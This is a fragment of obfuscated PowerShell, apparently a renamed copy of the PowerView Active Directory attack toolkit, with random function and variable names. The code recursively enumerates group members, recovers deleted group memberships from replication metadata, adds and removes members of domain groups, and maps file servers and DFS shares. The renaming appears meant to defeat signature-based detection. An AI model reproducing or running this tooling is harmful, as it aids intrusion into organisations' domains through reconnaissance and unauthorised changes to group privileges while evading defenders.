if ($qBTjdcuc99 -and $nbBIbJvp99) { | |
$nmZxBYze99 = $_.Properties | |
} | |
else { | |
$NiiUklGc99 = $ufgcNRNN99.Clone() | |
$NiiUklGc99['Identity'] = $gPVoRuJA99 | |
$NiiUklGc99['Raw'] = $True | |
$NiiUklGc99['Properties'] = 'distinguishedname,cn,samaccountname,objectsid,objectclass' | |
$Object = sniffling @ObjectSearcherArguments | |
$nmZxBYze99 = $Object.Properties | |
} | |
if ($nmZxBYze99) { | |
$MVWUVBmE99 = New-Object PSObject | |
$MVWUVBmE99 | Add-Member Noteproperty 'GroupDomain' $yZcGVRCm99 | |
$MVWUVBmE99 | Add-Member Noteproperty 'GroupName' $oDUyAheE99 | |
$MVWUVBmE99 | Add-Member Noteproperty 'GroupDistinguishedName' $JMzFaWio99 | |
if ($nmZxBYze99.objectsid) { | |
$DOQnuyZw99 = ((New-Object System.Security.Principal.SecurityIdentifier $nmZxBYze99.objectsid[0], 0).Value) | |
} | |
else { | |
$DOQnuyZw99 = $Null | |
} | |
try { | |
$geWgRWKT99 = $nmZxBYze99.distinguishedname[0] | |
if ($geWgRWKT99 -match 'ForeignSecurityPrincipals|S-1-5-21') { | |
try { | |
if (-not $DOQnuyZw99) { | |
$DOQnuyZw99 = $nmZxBYze99.cn[0] | |
} | |
$XldzUEQX99 = plagiarist -mxWgOMSt99 $DOQnuyZw99 -sVUXjDxI99 'DomainSimple' @ADNameArguments | |
if ($XldzUEQX99) { | |
$TullGYYM99 = $XldzUEQX99.Split('@')[1] | |
} | |
else { | |
Write-Warning "[paltriest] Error converting $geWgRWKT99" | |
$TullGYYM99 = $Null | |
} | |
} | |
catch { | |
Write-Warning "[paltriest] Error converting $geWgRWKT99" | |
$TullGYYM99 = $Null | |
} | |
} | |
else { | |
$TullGYYM99 = $geWgRWKT99.SubString($geWgRWKT99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
} | |
} | |
catch { | |
$geWgRWKT99 = $Null | |
$TullGYYM99 = $Null | |
} | |
if ($nmZxBYze99.samaccountname) { | |
$kgderrSt99 = $nmZxBYze99.samaccountname[0] | |
} | |
else { | |
try { | |
$kgderrSt99 = Malory -ObjectSID $nmZxBYze99.cn[0] @ADNameArguments | |
} | |
catch { | |
$kgderrSt99 = $nmZxBYze99.cn[0] | |
} | |
} | |
if ($nmZxBYze99.objectclass -match 'computer') { | |
$cFEgvwnp99 = 'computer' | |
} | |
elseif ($nmZxBYze99.objectclass -match 'group') { | |
$cFEgvwnp99 = 'group' | |
} | |
elseif ($nmZxBYze99.objectclass -match 'user') { | |
$cFEgvwnp99 = 'user' | |
} | |
else { | |
$cFEgvwnp99 = $Null | |
} | |
$MVWUVBmE99 | Add-Member Noteproperty 'MemberDomain' $TullGYYM99 | |
$MVWUVBmE99 | Add-Member Noteproperty 'MemberName' $kgderrSt99 | |
$MVWUVBmE99 | Add-Member Noteproperty 'MemberDistinguishedName' $geWgRWKT99 | |
$MVWUVBmE99 | Add-Member Noteproperty 'MemberObjectClass' $cFEgvwnp99 | |
$MVWUVBmE99 | Add-Member Noteproperty 'MemberSID' $DOQnuyZw99 | |
$MVWUVBmE99.PSObject.TypeNames.Insert(0, 'PowerView.GroupMember') | |
$MVWUVBmE99 | |
if ($PSBoundParameters['Recurse'] -and $geWgRWKT99 -and ($cFEgvwnp99 -match 'group')) { | |
Write-Verbose "[paltriest] Manually recursing on group: $geWgRWKT99" | |
$ufgcNRNN99['Identity'] = $geWgRWKT99 | |
$Null = $ufgcNRNN99.Remove('Properties') | |
paltriest @SearcherArguments | |
} | |
} | |
} | |
$rIAWkoat99.dispose() | |
} | |
} | |
} | |
function disappointing { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] | |
[OutputType('PowerView.DomainGroupMemberDeleted')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] | |
[String[]] | |
$mxWgOMSt99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Switch] | |
$Raw | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{ | |
'Properties' = 'msds-replvaluemetadata','distinguishedname' | |
'Raw' = $True | |
'LDAPFilter' = '(objectCategory=group)' | |
} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['LDAPFilter']) { $ufgcNRNN99['LDAPFilter'] = $hzaXgjDv99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
} | |
PROCESS { | |
if ($PSBoundParameters['Identity']) { $ufgcNRNN99['Identity'] = $mxWgOMSt99 } | |
sniffling @SearcherArguments | ForEach-Object { | |
$dFqddswb99 = $_.Properties['distinguishedname'][0] | |
ForEach($GLlmZdDA99 in $_.Properties['msds-replvaluemetadata']) { | |
$njXTfqiR99 = [xml]$GLlmZdDA99 | Select-Object -ExpandProperty 'DS_REPL_VALUE_META_DATA' -ErrorAction SilentlyContinue | |
if ($njXTfqiR99) { | |
if (($njXTfqiR99.pszAttributeName -Match 'member') -and (($njXTfqiR99.dwVersion % 2) -eq 0 )) { | |
$ySjxeOag99 = New-Object PSObject | |
$ySjxeOag99 | Add-Member NoteProperty 'GroupDN' $dFqddswb99 | |
$ySjxeOag99 | Add-Member NoteProperty 'MemberDN' $njXTfqiR99.pszObjectDn | |
$ySjxeOag99 | Add-Member NoteProperty 'TimeFirstAdded' $njXTfqiR99.ftimeCreated | |
$ySjxeOag99 | Add-Member NoteProperty 'TimeDeleted' $njXTfqiR99.ftimeDeleted | |
$ySjxeOag99 | Add-Member NoteProperty 'LastOriginatingChange' $njXTfqiR99.ftimeLastOriginatingChange | |
$ySjxeOag99 | Add-Member NoteProperty 'TimesAdded' ($njXTfqiR99.dwVersion / 2) | |
$ySjxeOag99 | Add-Member NoteProperty 'LastOriginatingDsaDN' $njXTfqiR99.pszLastOriginatingDsaDN | |
$ySjxeOag99.PSObject.TypeNames.Insert(0, 'PowerView.DomainGroupMemberDeleted') | |
$ySjxeOag99 | |
} | |
} | |
else { | |
Write-Verbose "[disappointing] Error retrieving 'msds-replvaluemetadata' for '$dFqddswb99'" | |
} | |
} | |
} | |
} | |
} | |
function gravitational { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, Mandatory = $True)] | |
[Alias('GroupName', 'GroupIdentity')] | |
[String] | |
$mxWgOMSt99, | |
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('MemberIdentity', 'Member', 'DistinguishedName')] | |
[String[]] | |
$aETbShlY99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$QRmioDKX99 = @{ | |
'Identity' = $mxWgOMSt99 | |
} | |
if ($PSBoundParameters['Domain']) { $QRmioDKX99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Credential']) { $QRmioDKX99['Credential'] = $KWcDeQDF99 } | |
$zFKrvxTl99 = dejection @ContextArguments | |
if ($zFKrvxTl99) { | |
try { | |
$Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($zFKrvxTl99.Context, $zFKrvxTl99.Identity) | |
} | |
catch { | |
Write-Warning "[gravitational] Error finding the group identity '$mxWgOMSt99' : $_" | |
} | |
} | |
} | |
PROCESS { | |
if ($Group) { | |
ForEach ($gPVoRuJA99 in $aETbShlY99) { | |
if ($gPVoRuJA99 -match '.+\\.+') { | |
$QRmioDKX99['Identity'] = $gPVoRuJA99 | |
$dZYHLPiR99 = dejection @ContextArguments | |
if ($dZYHLPiR99) { | |
$CiKxrVpf99 = $dZYHLPiR99.Identity | |
} | |
} | |
else { | |
$dZYHLPiR99 = $zFKrvxTl99 | |
$CiKxrVpf99 = $gPVoRuJA99 | |
} | |
Write-Verbose "[gravitational] Adding member '$gPVoRuJA99' to group '$mxWgOMSt99'" | |
$gPVoRuJA99 = [System.DirectoryServices.AccountManagement.Principal]::FindByIdentity($dZYHLPiR99.Context, $CiKxrVpf99) | |
$Group.Members.Add($gPVoRuJA99) | |
$Group.Save() | |
} | |
} | |
} | |
} | |
function payers { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, Mandatory = $True)] | |
[Alias('GroupName', 'GroupIdentity')] | |
[String] | |
$mxWgOMSt99, | |
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('MemberIdentity', 'Member', 'DistinguishedName')] | |
[String[]] | |
$aETbShlY99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$QRmioDKX99 = @{ | |
'Identity' = $mxWgOMSt99 | |
} | |
if ($PSBoundParameters['Domain']) { $QRmioDKX99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Credential']) { $QRmioDKX99['Credential'] = $KWcDeQDF99 } | |
$zFKrvxTl99 = dejection @ContextArguments | |
if ($zFKrvxTl99) { | |
try { | |
$Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($zFKrvxTl99.Context, $zFKrvxTl99.Identity) | |
} | |
catch { | |
Write-Warning "[payers] Error finding the group identity '$mxWgOMSt99' : $_" | |
} | |
} | |
} | |
PROCESS { | |
if ($Group) { | |
ForEach ($gPVoRuJA99 in $aETbShlY99) { | |
if ($gPVoRuJA99 -match '.+\\.+') { | |
$QRmioDKX99['Identity'] = $gPVoRuJA99 | |
$dZYHLPiR99 = dejection @ContextArguments | |
if ($dZYHLPiR99) { | |
$CiKxrVpf99 = $dZYHLPiR99.Identity | |
} | |
} | |
else { | |
$dZYHLPiR99 = $zFKrvxTl99 | |
$CiKxrVpf99 = $gPVoRuJA99 | |
} | |
Write-Verbose "[payers] Removing member '$gPVoRuJA99' from group '$mxWgOMSt99'" | |
$gPVoRuJA99 = [System.DirectoryServices.AccountManagement.Principal]::FindByIdentity($dZYHLPiR99.Context, $CiKxrVpf99) | |
$Group.Members.Remove($gPVoRuJA99) | |
$Group.Save() | |
} | |
} | |
} | |
} | |
function malfunctioning { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType([String])] | |
[CmdletBinding()] | |
Param( | |
[Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainName', 'Name')] | |
[String[]] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
function threesome { | |
Param([String]$Path) | |
if ($Path -and ($Path.split('\\').Count -ge 3)) { | |
$Temp = $Path.split('\\')[2] | |
if ($Temp -and ($Temp -ne '')) { | |
$Temp | |
} | |
} | |
} | |
$ufgcNRNN99 = @{ | |
'LDAPFilter' = '(&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(homedirectory=*)(scriptpath=*)(profilepath=*)))' | |
'Properties' = 'homedirectory,scriptpath,profilepath' | |
} | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
} | |
PROCESS { | |
if ($PSBoundParameters['Domain']) { | |
ForEach ($ShZaeqLs99 in $ADDDGomQ99) { | |
$ufgcNRNN99['Domain'] = $ShZaeqLs99 | |
$xEfuvBxo99 = Richelieu @SearcherArguments | |
$(ForEach($dCtAVLqt99 in $xEfuvBxo99.FindAll()) {if ($dCtAVLqt99.Properties['homedirectory']) {threesome($dCtAVLqt99.Properties['homedirectory'])}if ($dCtAVLqt99.Properties['scriptpath']) {threesome($dCtAVLqt99.Properties['scriptpath'])}if ($dCtAVLqt99.Properties['profilepath']) {threesome($dCtAVLqt99.Properties['profilepath'])}}) | Sort-Object -Unique | |
} | |
} | |
else { | |
$xEfuvBxo99 = Richelieu @SearcherArguments | |
$(ForEach($dCtAVLqt99 in $xEfuvBxo99.FindAll()) {if ($dCtAVLqt99.Properties['homedirectory']) {threesome($dCtAVLqt99.Properties['homedirectory'])}if ($dCtAVLqt99.Properties['scriptpath']) {threesome($dCtAVLqt99.Properties['scriptpath'])}if ($dCtAVLqt99.Properties['profilepath']) {threesome($dCtAVLqt99.Properties['profilepath'])}}) | Sort-Object -Unique | |
} | |
} | |
} | |
function privileges { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')] | |
[OutputType('System.Management.Automation.PSCustomObject')] | |
[CmdletBinding()] | |
Param( | |
[Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainName', 'Name')] | |
[String[]] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[ValidateSet('All', 'V1', '1', 'V2', '2')] | |
[String] | |
$WDaNDNia99 = 'All' | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{} | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
function Llewellyn { | |
[CmdletBinding()] | |
Param( | |
[Byte[]] | |
$Pkt | |
) | |
$bin = $Pkt | |
$udgCXWff99 = [bitconverter]::ToUInt32($bin[0..3],0) | |
$fxTbxIym99 = [bitconverter]::ToUInt32($bin[4..7],0) | |
$iSpjhTbK99 = 8 | |
$fgwaIzcO99 = @() | |
for($i=1; $i -le $fxTbxIym99; $i++){ | |
$UQwGjsMn99 = $iSpjhTbK99 | |
$aadSaFbs99 = $iSpjhTbK99 + 1 | |
$aEGmIvzK99 = [bitconverter]::ToUInt16($bin[$UQwGjsMn99..$aadSaFbs99],0) | |
$VurZPAlq99 = $aadSaFbs99 + 1 | |
$anLhmtVo99 = $VurZPAlq99 + $aEGmIvzK99 - 1 | |
$aaIpKsaz99 = [System.Text.Encoding]::Unicode.GetString($bin[$VurZPAlq99..$anLhmtVo99]) | |
$pwswMXMv99 = $anLhmtVo99 + 1 | |
$ZCgINIAJ99 = $pwswMXMv99 + 3 | |
$EGdrnAuM99 = [bitconverter]::ToUInt32($bin[$pwswMXMv99..$ZCgINIAJ99],0) | |
$tcyDWIIi99 = $ZCgINIAJ99 + 1 | |
$MofvsGsz99 = $tcyDWIIi99 + $EGdrnAuM99 - 1 | |
$wueWsUkW99 = $bin[$tcyDWIIi99..$MofvsGsz99] | |
switch -wildcard ($aaIpKsaz99) { | |
"\siteroot" { } | |
"\domainroot*" { | |
$JUjhNWzL99 = 0 | |
$TBUUJWQn99 = 15 | |
$xxNEjiMH99 = [byte[]]$wueWsUkW99[$JUjhNWzL99..$TBUUJWQn99] | |
$guid = New-Object Guid(,$xxNEjiMH99) # should match $isYbKJiG99 | |
$Jprecnkz99 = $TBUUJWQn99 + 1 | |
$SIPdmUtG99 = $Jprecnkz99 + 1 | |
$JElVIYXN99 = [bitconverter]::ToUInt16($wueWsUkW99[$Jprecnkz99..$SIPdmUtG99],0) | |
$XujuAykB99 = $SIPdmUtG99 + 1 | |
$mHWLDmuF99 = $XujuAykB99 + $JElVIYXN99 - 1 | |
$ekHkikJm99 = [System.Text.Encoding]::Unicode.GetString($wueWsUkW99[$XujuAykB99..$mHWLDmuF99]) | |
$QXWnvPQC99 = $mHWLDmuF99 + 1 | |
$NgGDyiyT99 = $QXWnvPQC99 + 1 | |
$olvZjMIK99 = [bitconverter]::ToUInt16($wueWsUkW99[$QXWnvPQC99..$NgGDyiyT99],0) | |
$JZgYRcAS99 = $NgGDyiyT99 + 1 | |
$MdRieRaH99 = $JZgYRcAS99 + $olvZjMIK99 - 1 | |
$BXdwIhXn99 = [System.Text.Encoding]::Unicode.GetString($wueWsUkW99[$JZgYRcAS99..$MdRieRaH99]) | |
$AwDRbQuM99 = $MdRieRaH99 + 1 | |
$EtHEXWBj99 = $AwDRbQuM99 + 3 | |
$type = [bitconverter]::ToUInt32($wueWsUkW99[$AwDRbQuM99..$EtHEXWBj99],0) | |
$QTDjytbD99 = $EtHEXWBj99 + 1 | |
$EEsQYEDU99 = $QTDjytbD99 + 3 | |
$state = [bitconverter]::ToUInt32($wueWsUkW99[$QTDjytbD99..$EEsQYEDU99],0) | |
$WbxXfeOf99 = $EEsQYEDU99 + 1 | |
$XOvcrNbz99 = $WbxXfeOf99 + 1 | |
$KdCQdIhs99 = [bitconverter]::ToUInt16($wueWsUkW99[$WbxXfeOf99..$XOvcrNbz99],0) | |
$hXIabGWu99 = $XOvcrNbz99 + 1 | |
$qeFTzRMF99 = $hXIabGWu99 + $KdCQdIhs99 - 1 | |
if ($KdCQdIhs99 -gt 0) { | |
$baOzrjxc99 = [System.Text.Encoding]::Unicode.GetString($wueWsUkW99[$hXIabGWu99..$qeFTzRMF99]) | |
} | |
$toaoPIho99 = $qeFTzRMF99 + 1 | |
$NpUMGTDT99 = $toaoPIho99 + 7 | |
$VMCWECvk99 = $wueWsUkW99[$toaoPIho99..$NpUMGTDT99] #dword lowDateTime #dword highdatetime | |
$FSWLfdXi99 = $NpUMGTDT99 + 1 | |
$vBqdEEMl99 = $FSWLfdXi99 + 7 | |
$wxjbMgQi99 = $wueWsUkW99[$FSWLfdXi99..$vBqdEEMl99] | |
$jOHYpcDu99 = $vBqdEEMl99 + 1 | |
$VZkeJGZB99 = $jOHYpcDu99 + 7 | |
$FgTdHnYl99 = $wueWsUkW99[$jOHYpcDu99..$VZkeJGZB99] | |
$MDriNYqR99 = $VZkeJGZB99 + 1 | |
$ncQFFKup99 = $MDriNYqR99 + 3 | |
$WDaNDNia99 = [bitconverter]::ToUInt32($wueWsUkW99[$MDriNYqR99..$ncQFFKup99],0) | |
$zquSAKQT99 = $ncQFFKup99 + 1 | |
$dFXKJMFo99 = $zquSAKQT99 + 3 | |
$wZnPEDEz99 = [bitconverter]::ToUInt32($wueWsUkW99[$zquSAKQT99..$dFXKJMFo99],0) | |
$dcEKaeoQ99 = $dFXKJMFo99 + 1 | |
$keRymrJS99 = $dcEKaeoQ99 + $wZnPEDEz99 - 1 | |
$NxfreBJn99 = $wueWsUkW99[$dcEKaeoQ99..$keRymrJS99] | |
$elspyBOG99 = $keRymrJS99 + 1 | |
$TWSxlfai99 = $elspyBOG99 + 3 | |
$ZOIxEwzf99 = [bitconverter]::ToUInt32($wueWsUkW99[$elspyBOG99..$TWSxlfai99],0) | |
$OcBQMaHM99 = $TWSxlfai99 + 1 | |
$JhyiZISa99 = $OcBQMaHM99 + $ZOIxEwzf99 - 1 | |
$HEIeUcWA99 = $wueWsUkW99[$OcBQMaHM99..$JhyiZISa99] | |
$mtWYTgfX99 = $JhyiZISa99 + 1 | |
$FNyARxeC99 = $mtWYTgfX99 + 3 | |
$YiWygpeA99 = [bitconverter]::ToUInt32($wueWsUkW99[$mtWYTgfX99..$FNyARxeC99],0) | |
$PuhHqbwK99 = 0 | |
$nIkpkhrh99 = $PuhHqbwK99 + 3 | |
$uNJkJsak99 = [bitconverter]::ToUInt32($NxfreBJn99[$PuhHqbwK99..$nIkpkhrh99],0) | |
$WIANpydl99 = $nIkpkhrh99 + 1 | |
for($j=1; $j -le $uNJkJsak99; $j++){ | |
$mGXusBIA99 = $WIANpydl99 | |
$NlIgqnwU99 = $mGXusBIA99 + 3 | |
$LzEZGigU99 = [bitconverter]::ToUInt32($NxfreBJn99[$mGXusBIA99..$NlIgqnwU99],0) | |
$tQdXXMhR99 = $NlIgqnwU99 + 1 | |
$rNegTGWX99 = $tQdXXMhR99 + 7 | |
$IGnmXPvJ99 = $NxfreBJn99[$tQdXXMhR99..$rNegTGWX99] | |
$biSwKLwH99 = $rNegTGWX99 + 1 | |
$yeMmGBPH99 = $biSwKLwH99 + 3 | |
$RrQJTuYv99 = [bitconverter]::ToUInt32($NxfreBJn99[$biSwKLwH99..$yeMmGBPH99],0) | |
$HFXmAGFU99 = $yeMmGBPH99 + 1 | |
$wGcmYmTe99 = $HFXmAGFU99 + 3 | |
$xEWEvIdA99 = [bitconverter]::ToUInt32($NxfreBJn99[$HFXmAGFU99..$wGcmYmTe99],0) | |
$ZncLYjOB99 = $wGcmYmTe99 + 1 | |
$YhJmAtnx99 = $ZncLYjOB99 + 1 | |
$JmGwuMsb99 = [bitconverter]::ToUInt16($NxfreBJn99[$ZncLYjOB99..$YhJmAtnx99],0) | |
$TRqHrxLr99 = $YhJmAtnx99 + 1 | |
$zABIUWSR99 = $TRqHrxLr99 + $JmGwuMsb99 - 1 | |
$AqDDwOuj99 = [System.Text.Encoding]::Unicode.GetString($NxfreBJn99[$TRqHrxLr99..$zABIUWSR99]) | |
$SKvnJTBT99 = $zABIUWSR99 + 1 | |
$emgUfibE99 = $SKvnJTBT99 + 1 | |
$ZdttdGVn99 = [bitconverter]::ToUInt16($NxfreBJn99[$SKvnJTBT99..$emgUfibE99],0) | |
$xFTdssot99 = $emgUfibE99 + 1 | |
$gEjjVofM99 = $xFTdssot99 + $ZdttdGVn99 - 1 | |
$iMcIOsKD99 = [System.Text.Encoding]::Unicode.GetString($NxfreBJn99[$xFTdssot99..$gEjjVofM99]) | |
$AxNRpCqH99 += "\\$AqDDwOuj99\$iMcIOsKD99" | |
$WIANpydl99 = $gEjjVofM99 + 1 | |
} | |
} | |
} | |
$iSpjhTbK99 = $MofvsGsz99 + 1 | |
$mATqKGnz99 = @{ | |
'Name' = $aaIpKsaz99 | |
'Prefix' = $ekHkikJm99 | |
'TargetList' = $AxNRpCqH99 | |
} | |
$fgwaIzcO99 += New-Object -TypeName PSObject -Property $mATqKGnz99 | |
$ekHkikJm99 = $Null | |
$aaIpKsaz99 = $Null | |
$AxNRpCqH99 = $Null | |
} | |
$FQpWtEKY99 = @() | |
$fgwaIzcO99 | ForEach-Object { | |
if ($_.TargetList) { | |
$_.TargetList | ForEach-Object { | |
$FQpWtEKY99 += $_.split('\')[2] | |
} | |
} | |
} | |
$FQpWtEKY99 | |
} | |
function prophecy { | |
[CmdletBinding()] | |
Param( | |
[String] | |
$ADDDGomQ99, | |
[String] | |
$GNYlaBrE99, | |
[String] | |
$CbStbNZR99, | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[Int] | |
$uTURXKBm99 = 200, | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
$RxxDrogK99 = Richelieu @PSBoundParameters | |
if ($RxxDrogK99) { | |
$nJDLHCBB99 = @() | |
$RxxDrogK99.filter = '(&(objectClass=fTDfs))' | |
try { | |
$hCEVDJUr99 = $RxxDrogK99.FindAll() | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
$nmZxBYze99 = $_.Properties | |
$jsfcxXsQ99 = $nmZxBYze99.remoteservername | |
$Pkt = $nmZxBYze99.pkt | |
$nJDLHCBB99 += $jsfcxXsQ99 | ForEach-Object { | |
try { | |
if ( $_.Contains('\') ) { | |
New-Object -TypeName PSObject -Property @{'Name'=$nmZxBYze99.name[0];'RemoteServerName'=$_.split('\')[2]} | |
} | |
} | |
catch { | |
Write-Verbose "[privileges] prophecy error in parsing DFS share : $_" | |
} | |
} | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[privileges] prophecy error disposing of the Results object: $_" | |
} | |
} | |
$RxxDrogK99.dispose() | |
if ($pkt -and $pkt[0]) { | |
Llewellyn $pkt[0] | ForEach-Object { | |
if ($_ -ne 'null') { | |
New-Object -TypeName PSObject -Property @{'Name'=$nmZxBYze99.name[0];'RemoteServerName'=$_} | |
} | |
} | |
} | |
} | |
catch { | |
Write-Warning "[privileges] prophecy error : $_" | |
} | |
$nJDLHCBB99 | Sort-Object -Unique -Property 'RemoteServerName' | |
} | |
} | |
function mortified { | |
[CmdletBinding()] | |
Param( | |
[String] | |
$ADDDGomQ99, | |
[String] | |
$GNYlaBrE99, | |
[String] | |
$CbStbNZR99, | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[Int] | |
$uTURXKBm99 = 200, | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
$RxxDrogK99 = Richelieu @PSBoundParameters | |
if ($RxxDrogK99) { | |
$nJDLHCBB99 = @() | |
$RxxDrogK99.filter = '(&(objectClass=msDFS-Linkv2))' | |
$Null = $RxxDrogK99.PropertiesToLoad.AddRange(('msdfs-linkpathv2','msDFS-TargetListv2')) | |
try { | |
$hCEVDJUr99 = $RxxDrogK99.FindAll() | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
